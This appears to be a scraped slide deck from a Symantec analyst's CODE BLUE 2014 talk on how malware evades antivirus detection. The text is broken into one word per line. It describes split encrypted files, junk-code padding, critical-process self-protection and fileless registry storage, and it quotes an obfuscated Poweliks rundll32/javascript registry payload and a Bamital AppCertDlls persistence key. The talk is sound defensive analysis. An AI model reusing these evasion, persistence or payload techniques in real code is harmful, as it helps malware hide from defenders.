Mais conteúdo relacionado Semelhante a CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA (20) CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA2. Self-‐introduc/on
Copyright
©
2014
Symantec
Corpora;on
2
• Threat
analysis
engineer
in
Symantec.
• Analyze
suspicious
file
and
create
An;-‐Virus
signature
• Provide
detailed
technical
descrip;on
to
customers
on
demand
• Publically
provide
malware-‐related
informa;on
4. ABacker’s
techniques
to
avoid
detec/ng
1
Store
decryp;on
key
and
data
in
separate
files
2
Large
amount
of
junk
code
3
Process
protec;on
4
Store
malicious
code
outside
of
files
(fileless
malware)
Copyright
©
2014
Symantec
Corpora;on
4
6. Trojan.Blueso
file
structure
Copyright
©
2014
Symantec
Corpora;on
6
RAR
self-‐extrac/ng
file
13
MB
AutoIt
executable
file
Decryp;on
code
script
file
Decryp;on
key
configura;on
file
Encrypted
code
AutoIt
is
a
programing
language
for
MicrosoW
Windows
plaYorm.
The
AutoIt
syntax
is
very
similar
to
that
of
BASIC
programing
language
and
is
designed
to
automate
the
Windows
GUI.
RAR
self-‐extrac;ng
file
drops
4
files,
then
it
execute
AutoIt
script
7. Decrypted
code
Bluso
inject
Backdoor.Trojan
Copyright
©
2014
Symantec
Corpora;on
7
Code
Decryp;on
key
Encrypted
code
Legi;mate
Windows
Process
Decryp;on
Part
of
Decrypted
code
Internet
Explorer
Process
Decry
pted
code
AutoIt
executable
8. Watch
Dog
monitor
Copyright
©
2014
Symantec
Corpora;on
8
File
deleted
Process
deleted
Create
Process
Inject
Create
File
Trojan.Blueso
make
file/registry/process
again
if
An;virus
delete
it.
9. ABacker’s
techniques
to
avoid
detec/ng
1
Store
decryp;on
key
and
data
in
separate
files
2
Large
amount
of
junk
code
3
Process
protec;on
4
Store
malicious
code
outside
of
files
(fileless
malware)
Copyright
©
2014
Symantec
Corpora;on
9
10. Tradi/onal
sample
Copyright
©
2014
Symantec
Corpora;on
10
Packer
/
Self
update
• Harder
to
detect
encrypted
files.
• Tradi;onal
sample
stored
all
informa;on
in
single
file.
Code
Decryp;on
key
Encrypted
code
Code
Decrypted
malicious
code
11. New
technique
to
avoid
detec/on
Copyright
©
2014
Symantec
Corpora;on
11
Tradi;onally
malware
saved
decrypted
image
to
a
file
and
executed.
An;virus
scanner
detects
malware
when
malware
saved
it
decrypted
image
onto
the
disk.
New
technique
is
to
inject
decrypted
image
to
a
new
running
process
and
executes
in
order
to
avoid
detec;on
by
file
scan.
Decrypted
malicious
code
Legi;mate
Windows
Process
Decrypt
in
memory
Decrypted
malicious
code
Code
Decryp;on
key
Encrypted
code
AutoIt
executable
13. An;Virus
scanner
scans
each
file.
Why
aBacker
split
malware
into
four
separate
files
Copyright
©
2014
Symantec
Corpora;on
13
AutoIt
executable
Decryp;on
code
Decryp;on
key
Seeng
file
Encrypted
code
Scan
Scan
Scan
Scan
14. What
does
this
mean?
• Hiding
malicious
code
by
encryp;ng
• Store
code,
decryp;on
key,
encrypted
code
in
separate
files.
• An;virus
scanner
can’t
determine
‘encrypted
code’
as
malicious
file.
• An;virus
scanner
can’t
detect
the
file
without
understanding
rela;onships
between
mul;ple
files.
Copyright
©
2014
Symantec
Corpora;on
14
15. ABacker’s
techniques
to
avoid
detec/ng
1
Store
decryp;on
key
and
data
in
separate
files
2
Large
amount
of
junk
code
3
Process
protec;on
4
Store
malicious
code
outside
of
files
(fileless
malware)
Copyright
©
2014
Symantec
Corpora;on
15
16. Code(Beginning
of
file)
Copyright
©
2014
Symantec
Corpora;on
16
I
TAB
character
is
replaced
with
1
byte
string
You
only
see
junk
comment
lines
!
19. Code
Copyright
©
2014
Symantec
Corpora;on
19
Finally,
at
line
23670,
16MB
in
size,
important
code
is
reached.
87476
lines
of
AutoIt
script
codes.
Only
900
lines
without
comment
lines.
Only
1%
important
codes.
20. An/virus
scan
method
Copyright
©
2014
Symantec
Corpora;on
20
• An;virus
scanner
needs
to
have
balance
between
detec;on
and
performance
• An;virus
scanner
first
determines
file
types
and
starts
file
scan
based
on
the
detected
file
type.
Executable
file
ZIP
file
JPEG
file
21. No
special
file
structure
in
text
file/script
file.
Copyright
©
2014
Symantec
Corpora;on
21
Script
files
have
no
file-‐header,
which
means
the
files
have
no
special
file
structure.
An;virus
scanner
needs
to
run
a
par;al
scan
and
determine
what
the
file
is.
Very
difficult
to
keep
scan
performance
if
malicious
script
has
so
many
comment/junk
code.
22. ABacker’s
techniques
to
avoid
detec/ng
1
Store
decryp;on
key
and
data
in
separate
files
2
Large
amount
of
junk
code
3
Process
protec;on
4
Store
malicious
code
outside
of
files
(fileless
malware)
Copyright
©
2014
Symantec
Corpora;on
22
23. How
does
Blueso
start
and
protect
itself?
Copyright
©
2014
Symantec
Corpora;on
23
Code
Decryp;on
key
Encrypted
code
Legi;mate
Windows
Process
Decryp;on
Internet
Explorer
process
Malware
!!
Malware
??
What
is
wrong
??
AutoIt
executable
24. Process
protec/on
mechanism
Copyright
©
2014
Symantec
Corpora;on
24
1) Terminate
Internet
Explorer
-‐>
Malicious
code
injected
into
Legi;mate
Windows
Process
is
executed
again
2) Terminate
Legi;mate
Windows
Process
-‐>
Running
script
on
AutoIt
execute
again
3) Terminate
AutoIt
?
-‐>
Handle
AutoIt
executable
as
an
essen;al
process
for
Windows
system
by
using
undocumented
API
NtSetInforma;onProcess
As
soon
as
AutoIT
is
terminated,
Windows
determines
it
as
unrecoverable
cri;cal
problem.
-‐>
Blue
Screen
Of
Death
!!
26. ABacker’s
techniques
to
avoid
detec/ng
1
Store
decryp;on
key
and
data
in
separate
files
2
Large
amount
of
junk
code
3
Process
protec;on
4
Store
malicious
code
outside
of
files
(fileless
malware)
Copyright
©
2014
Symantec
Corpora;on
26
27. Example
of
malware
store
code/data
in
irregular
place(Bamital)
Copyright
©
2014
Symantec
Corpora;on
27
Set
registry
entry
to
start
a
code
when
windows
restarts.
HKEY_LOCAL_MACHINEsystemCurrentControlSetControlSession
Manager
AppCertDlls"AppSecDll"
=
"%USER_Profile%Local
SeengsApplica;on
DataWindows
Serverxblscp.dll“
Because
of
analysis
already
performed,
xblscp.dll
is
determined
as
a
malicious
file.
Stricktly
speaking,
does
this
file
have
malicious
code
in
it?
28. Example
of
malware
store
code/data
in
irregular
place
(Bamital)2
Copyright
©
2014
Symantec
Corpora;on
28
How
it
works
• Allocate
memory
• Store
data
from
registry
to
the
allocated
memory
• Call
the
allocated
memory
An;virus
scanner
doe
not
know
data
rule.
The
data
is
wriven
in
registry.
Another
malware
uses
same
technique
by
file.
29. Example
of
malware
store
code/data
in
irregular
place(Poweliks)
Copyright
©
2014
Symantec
Corpora;on
29
Trojan.Poweliks
writes
a
Windows
Powershell
script
to
registry.
You
can
find
this
registry
entry
may
execute
encrypted
java
script.
Encrypted
code
that
should
be
decrypted
in
different
registry
entry.
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{73E709EA-‐5D93-‐4B2E-‐
BBB0-‐99B7938DA9E4}LocalServer32(Default)
=
rundll32.exe
javascript:"..mshtml,RunHTMLApplica;on
";eval("epdvnfou/xsjuf)
(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/
S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*,
(=0tdsjqu?(*".replace(/./g,func;on(_){return
%20String.fromCharCode(_.charCodeAt()-‐1);}))
"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
30. Conclusion
Copyright
©
2014
Symantec
Corpora;on
30
• Avackers
discover
new
techniques
every
day.
• Avackers
employ
techniques
to
make
malware
removal
difficult
• File
based
scanning
is
no
longer
effec;ve
• Mul;-‐layered
security
is
becoming
more
important
31. &
Q
A
Copyright
©
2014
Symantec
Corpora;on
31
32. Thank
you!
Copyright
©
2014
Symantec
Corpora/on.
All
rights
reserved.
Symantec
and
the
Symantec
Logo
are
trademarks
or
registered
trademarks
of
Symantec
Corpora;on
or
its
affiliates
in
the
U.S.
and
other
countries.
Other
names
may
be
trademarks
of
their
respec;ve
owners.
This
document
is
provided
for
informa;onal
purposes
only
and
is
not
intended
as
adver;sing.
All
warran;es
rela;ng
to
the
informa;on
in
this
document,
either
express
or
implied,
are
disclaimed
to
the
maximum
extent
allowed
by
law.
The
informa;on
in
this
document
is
subject
to
change
without
no;ce.
Hiroshi
Shinotsuka
Notas do Editor Tip: simple SEO adjustments can make your presentation more discoverable. Read this PDF for best practices: http://seo.ges.symantec.com/seo-best-practices-for-file-optimization.pdf AutoItのスクリプトファイル 32MB を Windows に備わっているメモ帳で読み込むには4秒かかった
例えば、ファイルをダブルクリックして実行しようとしたときに、実行までに4秒かかるとしたら、、、待てません!